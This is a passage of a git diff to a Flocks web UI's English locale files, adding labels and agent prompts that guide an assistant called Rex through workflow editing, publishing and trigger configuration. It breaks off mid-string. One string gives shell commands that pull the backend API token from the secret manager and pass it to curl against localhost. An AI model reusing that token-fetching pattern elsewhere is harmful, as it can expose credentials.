+          "prompt": "Please follow the .flocks/plugins/skills/tool-builder skill to guide me through creating a Flocks local Python tool. Do not write files yet. Use the question tool to ask only the single most important question at a time and confirm tool name, function, input parameter schema, return format, whether it needs file/command/network access, error handling, and smoke test. After I confirm, generate the tool under ~/.flocks/plugins/tools/python/."
+        },
+        {
+          "label": "Design IO",
+          "description": "Turn a natural-language need into clear parameters, types, and return JSON.",
+          "prompt": "Please help me design the local tool input and output. First confirm user, input fields, field types, required fields, defaults, return JSON structure, error object, and one minimal test sample. Do not write files until I confirm."
+        },
+        {
+          "label": "Plan Tests",
+          "description": "Generate minimal, boundary, and failure samples.",
+          "prompt": "Please use the tool-builder skill to help me plan test samples for the local tool. First confirm normal input, boundary input, invalid input, expected output, and execution method. Show a test plan before writing files."
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "Text Parser Tool",
+          "description": "Extract structured fields from logs, alerts, or reports.",
+          "prompt": "I want to create a local text parser tool that extracts structured fields from logs, alert text, or reports. Please follow the tool-builder skill to guide me through input format, field schema, parsing rules, and test samples."
+        },
+        {
+          "label": "JSON Transform Tool",
+          "description": "Clean, rename, or merge JSON fields.",
+          "prompt": "I want to create a local JSON transformation tool for cleaning, renaming, merging, or normalizing JSON fields. Please follow the tool-builder skill to guide me through input/output schema, transformation rules, and test samples."
+        },
+        {
+          "label": "Report Builder Tool",
+          "description": "Generate Markdown or summary reports from structured data.",
+          "prompt": "I want to create a local report builder tool that converts structured analysis results into a Markdown summary report. Please follow the tool-builder skill to guide me through input fields, report template, output format, and smoke test."
+        }
+      ]
+    }
+  },
+
   "addMCP": {
     "title": "Add MCP Service",
     "subtitle": "Configure and add an MCP service via form or chat",
@@ -494,9 +620,9 @@
     "toolCountLabel": "Tools",
     "resourceCountLabel": "Resources",
     "generateIntro": "Generate tools via AI conversation",
-    "generateDesc": "Switch to the \"AI Edit\" tab, describe the tool you need, Rex will auto-generate Python tool code and complete integration.",
+    "generateDesc": "Switch to the \"Workbench\" tab and describe the tool you need; Rex will auto-generate the Python tool code and complete the integration.",
     "doneLabel": "Done",
-    "mcpHintDesc": "Switch to the \"AI Edit\" tab, tell Rex what MCP service you want to connect, and it will automatically complete the configuration.",
+    "mcpHintDesc": "Switch to the \"Workbench\" tab, tell Rex what MCP service you want to connect, and it will automatically complete the configuration.",
     "connSuccess": "Connected",
     "connFailed": "Connection Failed",
     "addFailedTitle": "Add Failed"
diff --git a/webui/src/locales/en-US/update.json b/webui/src/locales/en-US/update.json
index b66de9504..a8f773023 100644
--- a/webui/src/locales/en-US/update.json
+++ b/webui/src/locales/en-US/update.json
@@ -21,7 +21,8 @@
   "waitingRestart": "Waiting for restart...",
   "checkFailed": "Failed to check version",
   "upgradeFailed": "Upgrade failed",
-  "restartTimeout": "Service restart timed out, please refresh manually",
+  "restartTimeout": "Service readiness check timed out: {{reason}}. Please refresh manually to confirm status.",
+  "restartUnknown": "No explicit health-check result was received",
   "dismissAction": "Don't remind me again",
   "dockerModeTitle": "Docker Deployment",
   "dockerModeDesc": "You are running Flocks via Docker. In-place upgrade is not available. Please pull the latest image and restart the container to upgrade.",
diff --git a/webui/src/locales/en-US/workflow.json b/webui/src/locales/en-US/workflow.json
index 6d71fe664..308320a1c 100644
--- a/webui/src/locales/en-US/workflow.json
+++ b/webui/src/locales/en-US/workflow.json
@@ -38,19 +38,69 @@
     "notFound": "Workflow not found",
     "backToList": "Back to List",
     "resetLayout": "Reset Layout",
-    "downloadMd": "Download MD",
-    "downloadMdTitle": "Download MD file",
-    "downloadJson": "Download JSON",
-    "downloadJsonTitle": "Download JSON file",
+    "flocksHelp": "Let Rex configure and edit workflows",
+    "flocksHelpTitle": "Let Rex configure and edit workflows",
+    "downloadMd": "Download Spec File",
+    "downloadMdTitle": "Download current workflow spec file",
+    "downloadJson": "Download Workflow File",
+    "downloadJsonTitle": "Download workflow file",
     "dragAdjust": "Drag to adjust panel width",
     "exportFailed": "Export failed",
-    "noMdDesc": "No MD description",
-    "noMdDescHint": "Describe your requirements in the right chat, AI will generate it automatically",
-    "mdUpdatedHint": "AI has updated the flow description, please check the MD document and provide feedback in the right chat.",
+    "noMdDesc": "No workflow.md",
+    "noMdDescHint": "Generate a workflow.md that is readable by both people and Flocks",
+    "mdUpdatedHint": "AI updated workflow.md. The diff is shown on the left; review it and continue in the right chat.",
+    "editDocTitle": "workflow.md",
+    "editDocUnsaved": "Unsaved",
+    "editDocModeEdit": "Edit",
+    "editDocModePreview": "Preview",
+    "editDocDiffTitle": "AI Change Diff",
+    "editDocDiffReviewDesc": "AI has already written these changes to workflow.md. Accept keeps the current content; reject restores the previous content.",
+    "editDocDiffHunkTitle": "Change {{index}}",
+    "editDocDiffAdded": "added",
+    "editDocDiffRemoved": "removed",
+    "editDocDiffAccept": "Accept",
+    "editDocDiffReject": "Reject",
+    "editDocDiffAcceptHunk": "Accept section",
+    "editDocDiffRejectHunk": "Reject section",
+    "editDocDiffRejecting": "Reverting",
+    "editDocDiffAcceptSuccess": "Accepted AI changes",
+    "editDocDiffAcceptHunkSuccess": "Accepted this section",
+    "editDocDiffRejectSuccess": "Rejected AI changes and restored workflow.md",
+    "editDocDiffRejectFailed": "Failed to reject AI changes",
+    "editDocDiffRejectHunkSuccess": "Rejected this section and updated workflow.md",
+    "editDocDiffRejectHunkFailed": "Failed to reject this section",
+    "editDocDiffEmpty": "No text differences detected",
+    "editDocSave": "Save",
+    "editDocSaving": "Saving",
+    "editDocSaveSuccess": "workflow.md saved",
+    "editDocSaveFailed": "Failed to save workflow.md",
+    "generateEditDoc": "Generate Spec",
+    "regenerateEditDoc": "Reset Document",
+    "generateEditDocTitle": "Ask Rex to generate workflow.md with the workflow-builder skill",
+    "regenerateEditDocTitle": "Reset the current workflow.md document",
+    "generateWorkflow": "Generate Workflow",
+    "generateWorkflowTitle": "Ask the workbench to generate or update workflow.json from the current workflow.md",
+    "regenerateWorkflowConfirmTitle": "Generate workflow?",
+    "regenerateWorkflowConfirmDesc": "workflow.md was saved. Generate or update workflow.json from the current content now?",
+    "regenerateWorkflowConfirmYes": "Generate",
+    "regenerateWorkflowConfirmNo": "Decline",
+    "editDocEmpty": "No workflow.md",
+    "editDocEmptyHint": "Generate a structured, editable workflow.md that can also guide workflow generation.",
+    "editDocPlaceholder": "Edit workflow.md here...",
+    "editDocTextareaLabel": "Edit workflow.md",
+    "generateEditDocPrompt": "This new task was triggered by the user clicking \"Generate Spec\". The button means: first use the workflow-builder skill to generate or complete the current workflow.md spec file. This task is not for generating workflow.json; unless I explicitly ask later, do not modify workflow.json.\n\nWorkflow name: {{name}}\nWorkflow directory: {{dir}}\nMD file: {{mdPath}}\nJSON definition file: {{jsonPath}}\n\nCurrent state: workflow.json exists, but workflow.md is missing or the left spec editor is empty. When entering the workbench, workflow.md must be generated first.\n\nPlease proceed as follows:\n1. Load and follow the workflow-builder skill first.\n2. You must use the question tool to ask whether I want a Chinese or English workflow spec; ask only one question at a time and allow custom input.\n3. Read the existing workflow.json and related workflow files, and use the workflow.json below to understand nodes, inputs, outputs, triggers, and execution logic.\n4. Use the workflow_zh.md / workflow_en.md template structure from the workflow-builder skill, but generate only one workflow.md file.\n5. Make workflow.md easy for humans to edit: explain purpose, scenarios, inputs, outputs, node flow, editable points, samples, and acceptance checks; do not make it read like machine JSON documentation.\n6. Before writing workflow.md, show a diff and wait for my confirmation; after confirmation, write {{mdPath}}.\n7. When finished, explain how workflow.md was generated and that the next step can be clicking \"Generate Workflow\" to update workflow.json from workflow.md.\n\nCurrent workflow.json:\n~~~json\n{{workflowJson}}\n~~~",
+    "generateWorkflowPrompt": "This new task was triggered by the user clicking the \"Generate Workflow\" button. The button means: generate or update the machine-executable workflow.json from the current workflow.md; unless I explicitly ask for it, do not regenerate or rewrite workflow.md.\n\nWorkflow name: {{name}}\nWorkflow directory: {{dir}}\nMD file: {{mdPath}}\nJSON definition file: {{jsonPath}}\n\nPlease proceed as follows:\n1. Load the workflow-builder skill first.\n2. Read the existing workflow.md and workflow.json, and use the current flow diagram structure to understand the existing implementation.\n3. Treat the current editor content of workflow.md as the main source of intent. If the file on disk differs from the content below, prefer the content below.\n4. Only generate/update workflow.json, preserving existing triggers, sample inputs, and metadata that are still reasonable.\n5. First provide a short generation plan. Before writing workflow.json, show a diff and wait for my confirmation.\n6. The generated workflow.json must be valid JSON, and nodes plus edges must form a complete flow diagram.\n7. When finished, explain what changed in workflow.json and how I should test it.\n\nCurrent editor content of workflow.md:\n~~~markdown\n{{editDocContent}}\n~~~",
     "canvasTabs": {
       "flow": "Flow Diagram",
-      "md": "MD Description",
-      "json": "JSON"
+      "md": "Flow Spec",
+      "json": "Workflow File"
+    },
+    "flowControls": {
+      "zoomIn": "Zoom in",
+      "zoomOut": "Zoom out",
+      "fitView": "Fit view",
+      "collapse": "Collapse canvas tools",
+      "expand": "Expand canvas tools"
     },
     "topBar": {
       "collapsePanel": "Collapse Panel",
@@ -68,9 +118,8 @@
     },
     "rightPanel": {
       "tabOverview": "Overview",
-      "tabChat": "AI Edit",
-      "tabRun": "Run",
-      "tabIntegration": "Integrations",
+      "tabChat": "Workbench",
+      "tabIntegration": "Publish",
       "renderError": "Component render error",
       "deleteWorkflow": "Delete Workflow",
       "deleteConfirmTitle": "Delete Workflow",
@@ -80,7 +129,8 @@
       "deleting": "Deleting..."
     },
     "overview": {
-      "configInfo": "Configuration",
+      "configInfo": "Info",
+      "workflowInfo": "Basics",
       "nodeCount": "Nodes",
       "nodesAndEdges": "{{nodes}} nodes / {{edges}} edges",
       "category": "Category",
@@ -88,6 +138,10 @@
       "createdBy": "Created By",
       "createdAt": "Created At",
       "updatedAt": "Updated At",
+      "workflowFiles": "Workflow Files",
+      "fileDir": "Directory",
+      "notGenerated": "(Not yet generated)",
+      "run": "Run",
       "runStats": "Run Statistics",
       "totalCalls": "Total Calls",
       "successRate": "Success Rate",
@@ -184,8 +238,10 @@
       "nodeLabel": "{{type}} Node"
     },
     "run": {
-      "testSection": "Test",
+      "testSection": "Test Run",
       "inputParams": "Input Parameters (JSON)",
+      "testSummaryIdle": "Inputs ready for a test run",
+      "triggerSection": "Trigger Capabilities",
       "rootObjectRequired": "Input parameters must be a JSON object",
       "running": "Running...",
       "testRun": "Test Run",
@@ -206,14 +262,46 @@
       "curlExample": "Call Example (curl)",
       "stopping": "Stopping...",
       "stopService": "Stop Service",
+      "deleteService": "Delete API publish config",
+      "deleteServiceShort": "Delete config",
+      "deletingService": "Deleting...",
+      "deleteServiceConfirm": "Delete this API publish config? If the service is still running, it will be stopped first.",
+      "deleteServiceFailed": "Failed to delete API publish config",
       "publishDesc": "Publish the workflow as a standalone API service with a dedicated invoke URL and API Key.",
       "publishing": "Publishing, please wait...",
       "publishAsApi": "Publish as API Service",
+      "guidePanelTitle": "Rex Assisted Publishing",
+      "guidePanelDesc": "Choose a publishing method. Rex will read guide.md and the config store first, then help you confirm, apply, or start it.",
+      "cardGuideTitle": "Flocks Assisted Config",
+      "cardGuideAction": "Assist config",
+      "cardGuideApiFocus": "API publish config",
+      "cardGuideApiDesc": "Use the current API service state, runtime driver, and workflow function to guide publishing, auth, sample calls, and whether to start it.",
+      "cardGuideTriggerDesc": "Use the current {{trigger}} card config and workflow function to guide input parameters, field mapping, samples, and apply/start behavior.",
+      "cardGuideDisplayLabel": "Flocks Assisted Config: {{focus}}",
+      "guideApiShort": "Publish API",
+      "guideApiDesc": "Ask Rex to confirm the API template, runtime driver, auth, invoke path, and whether to start the service.",
+      "guideApiInstruction": "The user clicked the API publish guide from the Publish page. Read guide.md around the \"Publish as API\" configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} so the backend can migrate the config.json fallback template. config.json and workflow.json publish/trigger entries are template sources only, not direct write targets and not proof of active state. When a template change is needed, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the user wants to actually start or stop the API service, use {{publishEndpoint}} / {{unpublishEndpoint}} after the template is confirmed. Do not pretend a service is published by editing template fields. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied or published, and do not keep asking what to do with workflow.json templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideSyslogShort": "Syslog Input",
+      "guideSyslogDesc": "Ask Rex to confirm the Syslog trigger template, protocol, port, mapping, and listener start/stop behavior.",
+      "guideSyslogInstruction": "The user clicked the Syslog input guide from the Publish page. Read guide.md around Syslog trigger/listener configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a Syslog trigger template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the user wants to start or stop listening, use the runtime endpoint for that capability, not a template enabled field. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied or started, and do not keep asking what to do with workflow.json trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideKafkaShort": "Kafka Input",
+      "guideKafkaDesc": "Ask Rex to confirm the Kafka trigger template, broker, topic, group, input mapping, and start/stop behavior.",
+      "guideKafkaInstruction": "The user clicked the Kafka input guide from the Publish page. Read guide.md around Kafka trigger/consumer configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a Kafka trigger template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the user wants to start or stop consuming, use the runtime endpoint for that capability, not a template enabled field. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied or started, and do not keep asking what to do with workflow.json trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideScheduleShort": "Schedule",
+      "guideScheduleDesc": "Ask Rex to confirm the schedule trigger template, interval, inputs, timeout, and start/stop behavior.",
+      "guideScheduleInstruction": "The user clicked the Schedule guide from the Publish page. Read guide.md around Schedule/Workflow Poller configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a schedule trigger template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the user wants to start or stop polling, use the runtime endpoint for that capability, not a template enabled field. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied or started, and do not keep asking what to do with workflow.json trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideWebhookShort": "Webhook Input",
+      "guideWebhookDesc": "Ask Rex to confirm the Webhook trigger template, path, method, auth, mapping, and sample.",
+      "guideWebhookInstruction": "The user clicked the Webhook input guide from the Publish page. Read guide.md around Webhook publish/input configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json Webhook triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a Webhook trigger template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied, and do not keep asking what to do with workflow.json Webhook trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
+      "guideAdapterShort": "Custom Input",
+      "guideAdapterDesc": "Ask Rex to confirm the custom input template, adapter, IO contract, and validation method.",
+      "guideAdapterInstruction": "The user clicked the custom input guide from the Publish page. Read guide.md around custom Trigger/Adapter configuration, then first read the backend config store with GET {{configEndpoint}}. If no stored template exists, use {{configSyncEndpoint}} to migrate the config.json fallback template. config.json and workflow.json triggers are template sources only, not direct write targets and not proof of active state. When adding or changing a custom input template, show a diff against the backend config first, then use the question tool for confirmation; after confirmation, PUT the full config object to {{configEndpoint}}. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied, and do not keep asking what to do with workflow.json trigger templates; read and apply the backend config store after it recovers. Ask one most important question at a time.",
       "dockerStarting": "Starting Docker container, may take 1-2 minutes...",
       "localStarting": "Starting local API service...",
       "serviceDriver": "Runtime",
       "driverLocal": "Local process",
       "driverDocker": "Docker container",
+      "applyDriver": "Apply runtime",
       "recommended": "Recommended",
       "driverLocalDesc": "Recommended first; starts faster for local development and debugging",
       "driverDockerDesc": "Runs isolated, best for validating container deployment",
@@ -270,6 +358,8 @@
       "syslogPortError": "Invalid port: must be an integer between 1 and 65535",
       "syslogActive": "Listening",
       "historySection": "Execution History",
+      "historySummary": "{{count}} records · Latest {{time}}",
+      "historySummaryLoading": "Loading execution history",
       "noHistory": "No execution records",
       "noOutput": "No output data",
       "stepsCompleted": "steps completed",
@@ -282,21 +372,74 @@
       "currentLabel": "Current",
       "inputPlaceholder": "Describe your workflow changes... (Enter to send)",
       "sessionTitle": "Edit Workflow \"{{name}}\"",
-      "contextMessage": "You are a workflow expert assistant helping users modify Flocks workflows. Please modify the workflow files based on the user's requirements.\n\nWorkflow Name: {{name}}\nCategory: {{category}}\nWorkflow Directory: {{dir}}\n\nFile Paths:\n- MD Description File: {{mdPath}}\n- JSON Definition File: {{jsonPath}}\n\nPlease load the workflow-builder skill first to complete the workflow modifications.",
+      "backendConfigAccessGuide": "Backend config-store authentication: directly curling GET {{configEndpoint}} returns 401 AuthError unless the request uses the Flocks backend API token `server_api_token`, stored in `flocks.security.get_secret_manager()`. This is not a browser cookie and not the `apiKey` under `api_services` in `flocks.json` (those are external-platform credentials). The backend service port is 8000; the WebUI on 5173 only forwards through the Vite proxy. Get the token with `python3 -c \"from flocks.security import get_secret_manager; print(get_secret_manager().get('server_api_token'))\"`. Read config with `curl -H \"Authorization: Bearer $(python3 -c 'from flocks.security import get_secret_manager; print(get_secret_manager().get(\"server_api_token\"))')\" \"http://127.0.0.1:8000{{configEndpoint}}\"`. Write config with `PUT {{configEndpoint}}`; migrate the fallback template with `POST {{configSyncEndpoint}}`. Related files: `flocks/security.py`, `flocks/server/auth.py`, `flocks/cli/main.py`, and `webui/src/config/apiProxy.ts`.",
+      "contextMessage": "You are a workflow expert assistant helping users modify or configure Flocks workflows. Choose the right skill and file operation based on the user's request.\n\nWorkflow ID: {{id}}\nWorkflow Name: {{name}}\nCategory: {{category}}\nWorkflow Directory: {{dir}}\n\nFile Paths:\n- Workflow document: {{mdPath}}\n- Workflow configuration guide: {{guidePath}}\n- JSON Definition File: {{jsonPath}}\n\nConfiguration endpoints:\n- Config template read/write: GET/PUT {{configEndpoint}}\n- Fallback template migration: POST {{configSyncEndpoint}}\n- API service start/stop: POST {{publishEndpoint}} / {{unpublishEndpoint}}\n- Trigger template management: {{triggersEndpoint}}\n\nCurrent frontend API endpoints:\n{{apiEndpoints}}\n\nSkill selection rules:\n- When modifying, regenerating, or creating workflow files, load the workflow-builder skill first and use workflow.md as the primary source of intent.\n- When the user asks for Flocks Help, smart configuration, configuration review, publish/integration setup, or sample validation, you may call skill_load(name=\"{{configSkillName}}\") for the interaction protocol, but you must first read and follow the workflow-local guide.md. Do not use the generic skill or skill references as a substitute for workflow-specific details in guide.md.\n\nSmart configuration guide rules:\n- Before configuration starts, you must read {{guidePath}}. If the file is missing or insufficient, explain the gap and use the question tool to ask whether to generate guide.md from workflow.md/config.json. Do not guess configuration details from a generic template.\n- Publish, input, and trigger templates must read the backend config store first: GET {{configEndpoint}}. If no stored template exists, use POST {{configSyncEndpoint}} to migrate the workflow-local config.json. 
config.json and workflow.json triggers are only import/fallback templates, not direct write targets, and cannot prove the configuration is active.\n- When changing a publish/input/trigger template, show a diff against the backend config first and confirm through the question tool; after confirmation, PUT the complete config object to {{configEndpoint}}. Do not directly modify workflow-local config.json or workflow.json to imply the configuration is active.\n- Publishing, starting, stopping, enabling, and disabling are runtime actions. Use the runtime endpoints in Current frontend API endpoints, such as {{publishEndpoint}}, {{unpublishEndpoint}}, {{triggersEndpoint}}, or the capability-specific endpoints. Do not pretend runtime state changed by editing template enabled fields.\n- If the backend config endpoint is unavailable, stop the configuration flow and clearly state that the backend config store cannot be read/written and nothing was applied, published, or started. Do not ask the user what to do with workflow.json trigger templates, and do not tell the user to use the WebUI later as a substitute for the result of this operation.\n- Keep the guide foolproof: when the user must choose, provide more information, confirm, or approve a diff, you must call the question tool and must not ask the question in ordinary text. Send one question card at a time, put the recommended default first, and include a custom/notes input where blank means none.\n- Do not ask for or expose plaintext secrets in chat. Use the system secret management flow when secrets are required.\n- Prioritize helping the user understand the current configuration, fill key choices, prepare one sample, validate input/output, and produce a final summary.",
       "welcome": {
         "title": "Workflow \"{{name}}\"",
-        "descPart1": "Describe your changes, AI will first update the MD description file. Review the left ",
-        "mdTabLabel": "\"MD Description\"",
-        "descPart2": " view to confirm the flow is correct, then AI will sync the JSON definition file.",
-        "fileDir": "Workflow File Directory",
-        "notGenerated": "(Not yet generated)",
+        "descPart1": "Describe your changes directly, or start with Flocks Help to clarify the setup. When a change is needed, AI will use workflow.md first. Review the left ",
+        "mdTabLabel": "\"Flow Spec\"",
+        "descPart2": " view to confirm the flow is correct before syncing the JSON definition file.",
+        "editPanelTitle": "Rex Assisted Editing",
+        "editPanelDesc": "Choose an editing entry. Rex will read this workflow's workflow.md and workflow.json, then guide you through confirming and updating \"{{name}}\".",
+        "editSectionTitle": "Assisted Editing",
+        "configSectionTitle": "Assisted Config",
+        "publishSectionTitle": "Assisted Publishing",
+        "editRequirementShort": "Edit Requirement",
+        "editRequirementDesc": "Turn the requested functional change into a structured requirement that can update workflow.md.",
+        "editRequirementPrompt": "The user clicked \"Edit Requirement\". Follow the workflow-builder skill to modify the functional requirement of this existing Flocks workflow. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json, summarize the current function, inputs, outputs, node flow, and known constraints; then use the question tool to ask one key question at a time to confirm the target, scope, input/output changes, acceptance criteria, and whether publish/trigger config is affected. Do not write files before showing a plan and diff and getting confirmation.",
+        "editNodeFunctionShort": "Change Node Function",
+        "editNodeFunctionDesc": "Adjust what a node is responsible for, its processing logic, inputs, outputs, and decision rules.",
+        "editNodeFunctionPrompt": "The user clicked \"Change Node Function\". Follow the workflow-builder skill to modify the business function of one node in this existing Flocks workflow. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json and list a brief summary of current node functions; then use the question tool to confirm which node to change, the current function, target function, input/output changes, acceptance criteria, and whether code implementation, upstream/downstream nodes, or publish config are affected. Do not write files before confirmation. When a change is needed, update the corresponding node function description in workflow.md first, show a diff, and only sync workflow.json after confirmation.",
+        "editNodeShort": "Edit Node Implementation",
+        "editNodeDesc": "Modify execution code, field mapping, tool arguments, or upstream/downstream connections.",
+        "editNodePrompt": "The user clicked \"Edit Node Implementation\". Follow the workflow-builder skill to edit implementation details of nodes in this existing Flocks workflow. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json, list the current nodes and edges briefly; then use the question tool to confirm which node to change, execution logic, code or tool arguments, input/output changes, upstream/downstream edge impact, and sample-data impact. Show a plan and diff before modifying files.",
+        "editFlowShort": "Adjust Flow",
+        "editFlowDesc": "Add, remove, or move nodes, and adjust branches, loops, joins, and data flow.",
+        "editFlowPrompt": "The user clicked \"Adjust Flow\". Follow the workflow-builder skill to adjust this existing Flocks workflow structure. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json and output the current Mermaid flow diagram; then use the question tool to confirm which nodes to add/remove/move, branch conditions, loop or join logic, field flow, and sample impact. Do not write files before confirmation; when a change is needed, show the workflow.md/workflow.json plan and diff first.",
+        "editRegenerateShort": "Generate Workflow",
+        "editRegenerateDesc": "Generate workflow.json from the current workflow.md or fix mismatch between docs and JSON.",
+        "editRegeneratePrompt": "The user clicked \"Generate Workflow\". This button means: follow the workflow-builder skill to generate or repair workflow.json for this existing Flocks workflow from the current workflow.md. The workflow ID is {{id}}, workflow directory is {{dir}}, MD file is {{mdPath}}, and JSON file is {{dir}}workflow.json. First read workflow.md and workflow.json, compare the human intent with the machine definition, then provide a short generation plan and use the question tool if the scope needs confirmation. The goal is to generate/update workflow.json, not to regenerate or rewrite workflow.md. Before writing workflow.json, show a diff and wait for confirmation.",
+        "guideTitle": "Flocks Help is ready",
+        "guideDesc": "Click once and I will read this workflow's guide.md, then lead you through the single most useful next step.",
+        "guidePrimary": "Start Smart Setup",
+        "guideAudit": "Review Config",
+        "guideSample": "Validate Sample",
+        "guidePrimaryShort": "Guide Smart Setup",
+        "guideAuditShort": "Review Current Config",
+        "guideSampleShort": "Validate Sample Data",
+        "guideInputModeShort": "Configure Inputs",
+        "guideSourceShapeShort": "Confirm Source Data",
+        "guideOutputShort": "Set Output Destination",
+        "guideFilterShort": "Adjust Filtering Rules",
+        "guideApplyShort": "Apply Config Plan",
+        "guidePrimaryDesc": "Let Flocks help configure this workflow",
+        "guideAuditDesc": "Check configured and missing items",
+        "guideSampleDesc": "Validate inputs and outputs with a sample",
+        "guideInputModeDesc": "Choose whether alerts enter through API, Syslog, Kafka, Webhook, Schedule, or files",
+        "guideSourceShapeDesc": "Confirm source product, payload format, and whether a sample exists",
+        "guideOutputDesc": "Choose local files, API response, Kafka/IM push, or downstream workflow output",
+        "guideFilterDesc": "Confirm filtering, denoising, deduplication, and business defaults",
+        "guideApplyDesc": "Choose whether to apply config, save a draft, or leave it unchanged",
+        "guideInputModeInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Input\" as an intent and extract entry modes, triggers, recommended defaults, constraints, and missing information to collect, then send one question card.",
+        "guideSourceShapeInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Source\" as an intent and extract source systems, payload shape, field mapping, sample status, and missing information to collect, then send one question card.",
+        "guideOutputInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Output\" as an intent and extract output contract, result storage, downstream destinations, external side effects, and missing information to collect, then send one question card.",
+        "guideFilterInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Rules\" as an intent and extract filtering, denoising, deduplication, thresholds, defaults, and missing information to collect, then send one question card.",
+        "guideSampleInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Sample\" as an intent and extract sample format, validation steps, prohibited side effects, and missing information to collect, then send one question card.",
+        "guideApplyInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Apply\" as an intent and extract publish-config source, apply/draft choices, validation rules, and missing information to collect. Applying publish/input/trigger templates must use GET/PUT {{configEndpoint}}; config.json may only be migrated through {{configSyncEndpoint}} as a fallback and must not be written directly to imply the change is active. If a change is needed, show a diff against the backend config first, then send one question card.",
+        "guideCollapse": "Collapse guide",
+        "guideExpand": "Expand guide",
+        "guideNote": "By default this only guides you. Any file change will show a diff first.",
+        "guidePrompt": "The user clicked the \"Guide Smart Setup\" button. This button means: perform a full configuration inventory and guided setup for this workflow. Read guide.md to discover what can be configured in this workflow, including but not limited to publish configuration, trigger/integration configuration, workflow execution configuration, input/output configuration, filtering/deduplication rules, sample validation, and runtime/template boundaries, then decide the single most useful next question to ask the user. The workflow ID is {{id}}, the workflow directory is {{dir}}, the workflow configuration guide is {{guidePath}}, the MD file is {{dir}}workflow.md, and the JSON file is {{dir}}workflow.json. The config template endpoint is GET/PUT {{configEndpoint}}, and the fallback migration endpoint is {{configSyncEndpoint}}.\n\nCurrent frontend API endpoints:\n{{apiEndpoints}}\n\nThe first step must be reading {{guidePath}}, and guide.md is the only source for this workflow's configuration methods, question order, defaults, and validation rules. You may call skill_load(name=\"{{configSkillName}}\") for the interaction protocol, but do not use the generic skill or skill references as a substitute for guide.md. If guide.md is missing or insufficient, stop and use the question tool to ask whether to generate guide.md from workflow.md/config.json. When I must choose, provide more information, confirm, or approve a diff, you must call the question tool and must not ask the question in ordinary text. Send one question card at a time, put the recommended default first, and include a custom/notes input where blank means none. Publish/input/trigger templates must read the backend config first, show a diff against that backend config, and after confirmation PUT the full config to {{configEndpoint}}; runtime actions must use the correct endpoint from Current frontend API endpoints. 
config.json and workflow.json triggers are migration fallbacks only and must not be written directly to imply the change is active. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied, and do not ask the user what to do with workflow.json trigger templates.",
+        "guideQuestionPrompt": "The user clicked the \"{{focus}}\" button. This button means: {{instruction}} The workflow ID is {{id}}, the workflow directory is {{dir}}, the workflow configuration guide is {{guidePath}}, the MD file is {{dir}}workflow.md, and the JSON file is {{dir}}workflow.json. The config template endpoint is GET/PUT {{configEndpoint}}, and the fallback migration endpoint is {{configSyncEndpoint}}.\n\nCurrent frontend API endpoints:\n{{apiEndpoints}}\n\nThe first step must be reading {{guidePath}}. Do not require guide.md to contain a button table; treat \"{{focus}}\" as the user's intent, semantically extract the relevant configuration guidance, defaults, constraints, examples, validation rules, and missing information from the full guide, then use that extracted guidance to help the user. You may call skill_load(name=\"{{configSkillName}}\") for the interaction protocol, but do not use the generic skill or skill references as a substitute for guide.md. If guide.md is missing or insufficient, stop and use the question tool to ask whether to generate guide.md from workflow.md/config.json. When I must choose, provide more information, confirm, or approve a diff, you must call the question tool and must not ask the question in ordinary text. Send one question card at a time, put the recommended default first, and include a custom/notes input where blank means none. Publish/input/trigger templates must read the backend config first, show a diff against that backend config, and after confirmation PUT the full config to {{configEndpoint}}; runtime actions must use the correct endpoint from Current frontend 